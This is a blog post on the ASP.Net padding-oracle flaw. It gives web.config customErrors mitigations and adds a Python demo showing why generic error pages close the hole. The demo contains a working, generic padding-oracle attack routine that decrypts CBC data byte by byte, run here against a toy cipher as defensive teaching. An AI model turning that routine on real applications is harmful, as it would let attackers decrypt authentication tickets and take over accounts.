Well, unless you’ve been living under a rock for the last week, you are probably aware of the crypto attack that is in the wild and targets ASP.Net applications. It is a padding-oracle attack: the application’s own error handling tells the attacker whether a tampered ciphertext decrypted to valid padding, and that single bit, asked over and over, is enough to decrypt data ASP.Net encrypts, such as ViewState and forms-authentication tickets. This attack raises many of the same issues we see regularly in the industry with SQL injection attacks: the application tells the attacker far more on failure than it should.
Wait, what? Yes, this is another of those situations where developers and administrators have been lazy. Yes, it is a vulnerability and it needs to be fixed, but it has become a massive issue because a large number of ASP.Net applications don’t handle errors correctly.
The recommended workaround (from the MS Security Advisory) is simply to enable customErrors and send every error to one generic error page. It is a workaround, not the fix: the fix is the security update, and this configuration is what keeps you safe in the meantime. The simple fact is that EVERY ASP.Net app out there should be doing this already. It is one of the many steps in mitigating attacks on websites, SQL injection included. Any detail that varies with the attacker’s input (a stack trace, a different error message, a different status code or redirect for a padding failure versus a parsing failure) is an oracle, and an oracle is all these attacks need.
So, let me quickly run through the bare essentials.
If you’re using .Net 3.0 or earlier (any version that does not have the redirectMode attribute, which arrived with .Net 3.5 SP1), add this to your web.config:
<configuration>
  <!-- allowOverride="false" stops a web.config deeper in the site from switching customErrors off -->
  <location allowOverride="false">
    <system.web>
      <!-- mode="On": detailed errors are never shown, not even to local requests -->
      <customErrors mode="On"
                    defaultRedirect="~/error.html" />
    </system.web>
  </location>
</configuration>
For .Net 3.5 SP1 and above, use redirectMode="ResponseRewrite". The error page is then rendered in place, with no 302 redirect and no aspxerrorpath query string, so the attacker cannot tell error cases apart by the URL they land on. The target has to be a page ASP.Net can execute, hence ErrorPage.aspx rather than a static .html. Whichever version you are on, keep a single defaultRedirect with no per-status <error> entries, and make sure the error page itself renders exactly the same content for every error.
<configuration>
  <!-- allowOverride="false" stops a web.config deeper in the site from switching customErrors off -->
  <location allowOverride="false">
    <system.web>
      <!-- ResponseRewrite serves the error page in place: no 302, no aspxerrorpath in the URL -->
      <customErrors mode="On"
                    redirectMode="ResponseRewrite"
                    defaultRedirect="~/ErrorPage.aspx" />
    </system.web>
  </location>
</configuration>
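To see why one generic page closes the hole, here is an added example that is not from the original post or the advisory: a Python simulation of a handler that decrypts a CBC-encrypted ticket and then checks its contents, run once with detailed errors and once with every failure mapped to the same response. The block cipher is a toy Feistel network standing in for AES (the attack only uses the structure of CBC, not the cipher), the key, IV and ticket are constructed sample values, and the response strings are hypothetical. With detailed errors the attacker can tell "padding is invalid" from "ticket is malformed" and recovers the plaintext a byte at a time; with uniform responses the same attack code gets no signal and gives up.

```python
"""Added demo (not from the original post): a CBC padding oracle, and why one generic error page closes it."""
import hashlib
import hmac

BLOCK = 16
PADDING_ERROR = "500 Padding is invalid and cannot be removed."        # hypothetical detailed error
GENERIC_ERROR = "500 An error occurred while processing your request."  # hypothetical customErrors page


class PaddingError(Exception):
    pass


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    # Toy Feistel round function standing in for AES; the attack relies on CBC only
    return hmac.new(key + bytes([rnd]), half, hashlib.sha256).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, xor(l, _f(key, i, r))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _f(key, i, l)), l
    return l + r


def cbc_encrypt(key: bytes, iv: bytes, pt: bytes) -> bytes:
    n = BLOCK - len(pt) % BLOCK
    pt += bytes([n]) * n                                  # PKCS#7 padding
    out, prev = b"", iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, xor(pt[i:i + BLOCK], prev))
        out += prev
    return iv + out


def cbc_decrypt(key: bytes, ct: bytes) -> bytes:
    prev, out = ct[:BLOCK], b""
    for i in range(BLOCK, len(ct), BLOCK):
        out += xor(block_decrypt(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    n = out[-1] if out else 0
    if not 1 <= n <= BLOCK or out[-n:] != bytes([n]) * n:
        raise PaddingError                                # the error the attacker wants to observe
    return out[:-n]


def handle_request(key: bytes, token: bytes, custom_errors: bool) -> str:
    """Simulated handler: decrypt a ticket, then validate its contents.
    custom_errors=False reports *which* step failed; True maps every failure to one page."""
    try:
        if not cbc_decrypt(key, token).startswith(b"user="):
            raise ValueError("malformed ticket")
        return "200 OK"
    except PaddingError:
        return GENERIC_ERROR if custom_errors else PADDING_ERROR
    except ValueError:
        return GENERIC_ERROR if custom_errors else "500 malformed ticket"


def padding_oracle_attack(oracle, ct: bytes):
    """Recover the padded plaintext of ct from oracle(ct) -> bool ('padding accepted').
    Returns None when the oracle answers every query the same way, i.e. there is no oracle."""
    blocks = [ct[i:i + BLOCK] for i in range(0, len(ct), BLOCK)]
    recovered = b""
    for prev, target in zip(blocks, blocks[1:]):
        inter = bytearray(BLOCK)                         # D_k(target), learned byte by byte
        for pos in range(BLOCK - 1, -1, -1):
            pad = BLOCK - pos
            forged = bytearray(BLOCK)
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ pad               # force the bytes after pos to equal pad
            hits = []
            for guess in range(256):
                forged[pos] = guess
                if oracle(bytes(forged) + target):
                    if pos == BLOCK - 1:                 # rule out a lucky 02 02 / 03 03 03 match
                        forged[pos - 1] ^= 1
                        still_ok = oracle(bytes(forged) + target)
                        forged[pos - 1] ^= 1
                        if not still_ok:
                            continue
                    hits.append(guess)
            if len(hits) != 1:                           # uniform responses: no information
                return None
            inter[pos] = hits[0] ^ pad
        recovered += xor(bytes(inter), prev)
    return recovered


def run_demo(custom_errors: bool):
    key = hashlib.sha256(b"constructed demo key").digest()[:16]   # constructed sample key
    iv = bytes(range(BLOCK))                                      # constructed sample IV
    token = cbc_encrypt(key, iv, b"user=alice;role=admin")        # constructed sample ticket
    oracle = lambda ct: handle_request(key, ct, custom_errors) != PADDING_ERROR
    return padding_oracle_attack(oracle, token)


if __name__ == "__main__":
    print("detailed errors:", run_demo(False))   # plaintext plus its PKCS#7 padding
    print("customErrors On:", run_demo(True))    # None: every response looks the same
```

The attack never touches the key; it only needs to know which of its 256 guesses per byte the server accepted, and the detailed error message hands it that. The demo models only the body of the response, but the same reasoning applies to anything else that differs between the two failure paths, including how long the server takes to answer.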
Please, don’t be lazy, make sure your Web Apps are secure.